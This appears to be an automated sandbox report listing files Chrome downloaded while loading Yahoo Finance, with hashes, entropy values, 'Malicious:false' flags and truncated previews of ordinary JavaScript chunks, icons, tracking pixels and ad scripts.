                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as U,p as q,k as b,i as d,e as G,d as W,q as n,O as N,C as m,a6 as B,G as E,n as w,c as F,u as M,g as O,a as Y}from"./scheduler.Dsuh-FKt.js";import{S as j,i as z,g as J,a as g,e as K,t as h}from"./index.CvwOawEI.js";const Q=r=>({}),C=r=>({});function V(r){let e,t,a,l,c,f;return{c(){e=G("img"),this.h()},l(o){e=W(o,"IMG",{class:!0,alt:!0,src:!0,srcset:!0,sizes:!0,fetchpriority:!0,loading:!0}),this.h()},h(){n(e,"class",t=N(`tw-bg-opacity-25 ${r[4]}`)+" yf-13q9uv1"),n(e,"alt",r[3]),m(e.src,a=r[1])||n(e,"src",a),B(e,l=r[2])||n(e,"srcset",l),n(e,"sizes",r[8]),n(e,"fetchpriority",r[6]),n(e,"loading",r[0])},m(o,s){b(o,e,s),c||(f=E(e,"error",r[13]),c=!0)},p(o,s){s&16&&t!==(t=N(`tw-bg-opacity-25 ${o[4]}`)+" yf-13q9uv1")&&n(e,"class",t),s&8&&n(e,"alt",o[3]),s&2&&!m(e.src,a=o[1])&&n(e,"src",a),s&4&&l!==(l=o[2])&&n(e,"srcset",l),s&256&&n(e,"sizes",o[8]),s&64&&n(e,"fetchpriority",o[6]),s&1&&n(e,"loading",o[0])},i:w,o:w,d(o){o&&d(e),c=!1,f()}}}function v(r){let e;const t=r[12].fallback,a=F(t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (15752)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.489799632131915
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:63ZObhsBV95gsZ+eGi1HgSXZmeke2ZMY0rnt58xPr:+ObaT95/+e9H9Jmle2ZMY0nt58xz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7364073E3C30C116E8EB5B04709AECFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EC52F3861CDCD208B70B6E90F2BADDC333CE9384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BE33EDF61ACD72CA8491BE3DBD63213D0AA5D41F43D9093D688C83573375EF0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1B48A2AD53BCA9C6CB27516519C64F3525696F64BC7CFC097891A60D048FF53FC85ACDCC720518D33E9B218CB13AF231BCE3B4CF435D7CF7446950E86063F5F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Sparkline.Dm-g_Bwm.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as ie,e as z,d as I,f as A,i as S,q as w,K as T,k as q,n as L,Z as ce,y as pe,A as Y,T as G,p as B,U as R,V as D,l as x,x as fe,o as be,Q as _e,O as U}from"./scheduler.Dsuh-FKt.js";import{S as he,i as ue,g as ye,a as F,e as we,t as J,c as ke,b as ve,m as Pe,d as Se}from"./index.CvwOawEI.js";import{e as W}from"./each.CI2tb2RB.js";import{g as H}from"./spread.CgU5AtxT.js";import{f as K,t as Ce,j as Q}from"./sortable.esm.CIj-TXsI.js";import{g as de,e as Ee}from"./commonUtil.BWwawKjd.js";import{l as Ae}from"./loadSparkline.C8zWaz2x.js";function Oe(o,t,e){return(t=function(n){var r=function(s,l){if(typeof s!="object"||!s)return s;var c=s[Symbol.toPrimitive];if(c!==void 0){var h=c.call(s,l||"default");if(typeof h!="object")return h;throw new TypeError("@@toPrimitive must return a primitive value.")}return(l==="string"?String:Number)(s)}(n,"string");return typeof r=="symbol"?r:r+""}(t))in o?Object.defineProperty(o,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):o[t]=e,o}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1530)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.370116251839234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:VEn7QSlNrJ22exGwJOnN3MgecZK9y1loVqOCtRFlrnXnHXqp+clOIg8:un71rJ2X0N3Mu4aloVotjlrnX9clK8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5F473056C59948116197D90ACFE8A57C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C99AA57EC44D69FE264AE44A0B55420EE8BA2139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:24D491AE174252A8DD988812547913F2173FA55521849E4AE65EAEBC123C70F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:566B1DE762E3D72BE59C612F099AB93C5C532F14C5A95902E0378D1F04D5F5B70FE8160488BAAD2CFA52BF49B5ACFE5A5F596B4C3CC2B24CEB77164BE376C280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as _,e as h,d as b,f as v,i as p,q as u,k as g,o as k}from"./scheduler.Dsuh-FKt.js";import{S as M,i as C,c as N,b as y,m as S,t as $,a as q,d as w}from"./index.CvwOawEI.js";import{p as E}from"./stores.BCwnb1-k.js";import{M as O,a as f}from"./marketsUtil.CypAdIhq.js";import{N as T}from"./NavBar.C76aWv9B.js";import{r as x,t as A}from"./commonUtil.BWwawKjd.js";function B(s){let a,e,n;return e=new T({props:{ariaLabel:"Markets Navigation",items:s[0],listClassName:"md:tw-pt-[--space-1]",i13nModel:{elm:"navcat",sec:"mrkt-fin-navbar"},vertical:!0}}),{c(){a=h("section"),N(e.$$.fragment),this.h()},l(t){a=b(t,"SECTION",{class:!0,"data-testid":!0});var r=v(a);y(e.$$.fragment,r),r.forEach(p),this.h()},h(){u(a,"class","container yf-kpoc60"),u(a,"data-testid","markets-nav-bar")},m(t,r){g(t,a,r),S(e,a,null),n=!0},p(t,[r]){const o={};r&1&&(o.items=t[0]),e.$set(o)},i(t){n||($(e.$$.fragment,t),n=!0)},o(t){q(e.$$.fragment,t),n=!1},d(t){t&&p(a),w(e)}}}function I(s,a,e){let n,t,r,o;k(s,E,c=>e(4,o=c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (557)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.593867408725143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:eR10My84ELsxmNvRwQyRj6LFXRFNLI9hU0LXE8IFAak:q10Mh45Mwb2xBPI9CEIFAak
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B1F394C472BEB3ED175AECA5299FDF8E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:550BEAB0DACAE6ED62C5D773B855865BFBEF4EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BE22B8C042BBF394E7B9F6EAC022629D9BEA9C22A88B6631B13ED50372B84F1A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:485897C7EC9A691C86DBBC925C1CA748EF445BD58615B7C9CFFD9D5C371CDC5C0C15CF97F80609CA8B51FA8534AF0277583C7F9BA1C696662B66DA9129D62689
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/yf-unlock.DelAiXlN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M17 6v4h1.08c.672 0 1.008 0 1.265.13a1.2 1.2 0 0 1 .524.525c.131.257.131.593.131 1.265v8.16c0 .672 0 1.008-.13 1.265a1.2 1.2 0 0 1-.525.524c-.257.131-.593.131-1.265.131H5.92c-.672 0-1.008 0-1.265-.13a1.2 1.2 0 0 1-.524-.525C4 21.088 4 20.752 4 20.08v-8.16c0-.672 0-1.008.13-1.265a1.2 1.2 0 0 1 .525-.524C4.912 10 5.248 10 5.92 10h9.18V6c0-1.71-1.39-3.1-3.1-3.1-1.36 0-2.518.88-2.935 2.1H7.1A5.002 5.002 0 0 1 17 6" clip-rule="evenodd"/></svg>';export{c as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853534452243269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JSXE4Dag5Ne5NOjLj4VMJFJXRzv:W75NHz4i5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C31E6E826F9E785DA9D9EE3F642F9155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5FA49909AF9DFCB3D02CCE29E1FCA76A2674F564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:34E46A06DC1B7FA8E798B8AB5044D1A3C69110168C1615A4E60B18F5F23E3E72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4A987F544B5DF19CF5533032222A9E2F059B985BB9219A289E6B09FD89C19D2C98D23D7FF1CB6BE217B45D000199E18CC9D7C886998CFF7B1B9074CBF627ADC7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/entry/start.CbYNsXlr.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{e as a}from"../chunks/43.BgWy8GOF.js";export{a as start};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):87389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.375294412229756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:YOVycZ4I40pj1oBjP1ZpjnpOifu0TcuNhahw+db/3P05v:Bo0pKBjt+0ouNhardb/3P09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:66B2B6A7E55444CDB9D1F4906BC9E6D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BB7B94E10B78412D72E4C3D663C9A6DCC60FAA24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1B634260C85D8B8307F64D1BB2AFF505E3735626DA91FB6DA5E76CA6B7EC09B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3443DAC607845F85F4CCACE7B7FC0C7B551AC3BADCC6A18073CFD4C4A3CCDE6EB48683C07CBC3CADEC86F809A741745B9783F3CDF91E8BB83D014AAD95EBDDE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/benji/benji-2.1.123.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",C="VERSION",A={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.152569011092753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHNlWRNgMwn6W9fbG4:YEOBtMrgr6W95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CC05FCFEDB17DE965F08D6060E720AEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A888888659F0E92AC129CC80AEE7D78B8E1FC5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9F1CF0A1DC03D8D39619D772B1E0C246D0B600B5D6364081744822D584831535
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BC96D54C0D92919B175D5B1A2E1CA4B808930F96A1BA02F77F3129BC83EAC414814722C0F8E4983244711CAB7D967D5B0866E3C522D9158EA0CD5C2CD56D07F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (25493), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):25493
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.392465147089054
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:KhHlQF7B2QYFkqfL5F5gh2X4dL0d9CubjNIab:SlRJ75F5gUXld9RBb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4DA9B72005BDD8F325EBEB2F17CD99EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:43ED5E3487B6846A40377FCADF306A2DEC872608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5189992250B72DB9473A38B73BE2F86427603F8320800A4953E040A27E51DA6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E0A172ECCC536D69E86EFC4FC0098DD3ABEF79D4E27295392F741278ABCAE4392B41653CDFE470D75238CF6CDF200A73EA464C83382D044D99DD59C2D473F5F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var t=function(e,o){return t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var o in e)Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o])},t(e,o)};var e=function(){return e=Object.assign||function(t){for(var e,o=1,n=arguments.length;o<n;o++)for(var i in e=arguments[o])Object.prototype.hasOwnProperty.call(e,i)&&(t[i]=e[i]);return t},e.apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var o="messages-count",n="navigate",i="scroll-lock",s="scroll-release",a="spotim_error",r="spotim_event",c="sso_api_ready",d="spot-im-renew-sso",p="sso_code_a",m="sso_login_error",l="sso_login_success",u="storage_update",h="spot-im-share-type",f="spot-im-comment-reported",g="spot-im-conversation-failed",v="spot-im-conversation-loaded",w="ow-error-event",_="spot-im-launcher-failed",y="spot-im-notification-drop-down-link",S="spot-im-user-notifications-click",I="ow-performance-event",A="spot-im-show-mo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2362)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2363
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4072764594615625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:giD1CbajzZhmA+h/8WaZFKrjmdg45eS5R+/T2CLvZAd5wq2sTL6:gigb87X+h8lZFK/Rd1jq20L6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:61A98EA385876F3254A6EEFB2BED9A9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:18C1CA36F86F273039691F6C4A6A5B36CF86C657
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2CDCF44AD57A5F0D1CD0DAAFE5EBCA40CFD1B2331B6865E67B23F55C91C4B0DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C59676B600FCF00D6035B7C4F86880C61455E1E9FB877552E0DE6D8657E714A81EF252A99531B83F9F54D1BED400CFA631775780C92E830F4F991186C7F46380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as R,e as w,d as S,f as _,i as f,q as F,k as v,o as k,D as q,I as B,n as Y}from"./scheduler.Dsuh-FKt.js";import{S as A,i as I,c as T,b as x,m as D,t as E,a as H,d as P}from"./index.CvwOawEI.js";import{m as G,s as L,g as p,G as M}from"./commonUtil.BWwawKjd.js";import{R as V}from"./RMP.G38kzltP.js";import{g}from"./43.BgWy8GOF.js";function Q(c){let e;return{c(){e=w("div"),this.h()},l(t){e=S(t,"DIV",{class:!0}),_(e).forEach(f),this.h()},h(){F(e,"class","placeholder yf-6nfr06")},m(t,o){v(t,e,o)},p:Y,d(t){t&&f(e)}}}function U(c){let e,t,o;return t=new V({props:{key:"tdv2-wafer-header.HeaderYBar",data:c[1],$$slots:{default:[Q]},$$scope:{ctx:c}}}),{c(){e=w("div"),T(t.$$.fragment),this.h()},l(n){e=S(n,"DIV",{class:!0});var a=_(e);x(t.$$.fragment,a),a.forEach(f),this.h()},h(){F(e,"class","ybar-sticky")},m(n,a){v(n,e,a),D(t,e,null),o=!0},p(n,[a]){const d={};a&2048&&(d.$$scope={dirty:a,ctx:n}),t.$set(d)},i(n){o||(E(t.$$.fragment,n),o=!0)},o(n){H(t.$$.fragment,n),o=!1},d(n){n&&f(e),P(t)}}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1453)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1454
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.145878629848918
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:+06pL8mk9o7KJS7jk34LT2+LbngEXHLbQHLT2+Lbw7LbFXTyLT2+Lb27LbMz6/a9:+06mmkiMSfc4++HngEXHHQH++Hw7HFmL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:831E06616F41D1C007E6453597D83E8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BDD088CF1406A687E2A0E5B651A350FEE36054AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B55EF4498629C1D442F1263D339C47B7005EBF78C7D144BCA9075701AACD8C2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:22AD53124EBF26482ED68529552E6AE898C7C8DB7DC475890D51C7790B52AFF283007D0570013E2FDC68875836C272088832227D2957E0900CCFA38520D351FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/i13nUtil.8E8_gCdn.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const a=["dock-rmp","dock-upsell-rmp-dialog","footer-rmp"],c=n=>!n||typeof n!="object"?"":Object.keys(n).map(o=>n[o]!==void 0&&`${o}:${encodeURIComponent(n[o])}`).filter(Boolean).join(";");function r(n){return n?Object.fromEntries(n.split(";").map(o=>{const[e,i]=o.split(":");return[e,decodeURIComponent(i||"")]})):{}}function s(n,o,e,i){if(window&&window.rapidInstance&&typeof window.rapidInstance.beaconClick=="function"){const t=Object.assign({},{etrg:"click"},e.pp);delete e.pp,window.rapidInstance.beaconClick(n,o||"-",e._p||0,e,e.outcm||"clicked",i,{pp:t})}}function d(n,o){window&&window.rapidInstance&&typeof window.rapidInstance.beaconEvent=="function"&&window.rapidInstance.beaconEvent(n,o,o.outcm||"event")}function p(n){window&&window.rapidInstance&&typeof window.rapidInstance.beaconPerformanceData=="function"&&window.rapidInstance.beaconPerformanceData({perf_usertime:{utm:n}})}function f(){const n="nimbus-app",o="nimbus-finheader",{rapidInstance:e}=window;e&&[n,o,...a].forEach(i=>{i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1607)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.398043379864443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TP3/nMdHi2JBg2HF1aDVJL03P7uz3qP6US5HVarRMOJfXDmE71ACvlc+asFMRFFy:Tv/nMdHi27g2lig3P7kaFSARxt2CfFQQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:158A2A73627F010A0C7DCBE57774D5BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:57254E05F8AC89BCBD1E545FF02A8AEA7F008B34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A770123DA533A5DDEF3EFC9B8C410C41475CA160E4CB576FB1880AA591910D78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:61BE7BB582ACA02F15816F054E959EE3DE3221E7C9CD919D1F87E2BEC1373C0A99AE05A8AF413AA976C76746216BE2C6E94B120F897EA06C8D0DFA4832F5B021
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadNewsStream.DpYg868c.js
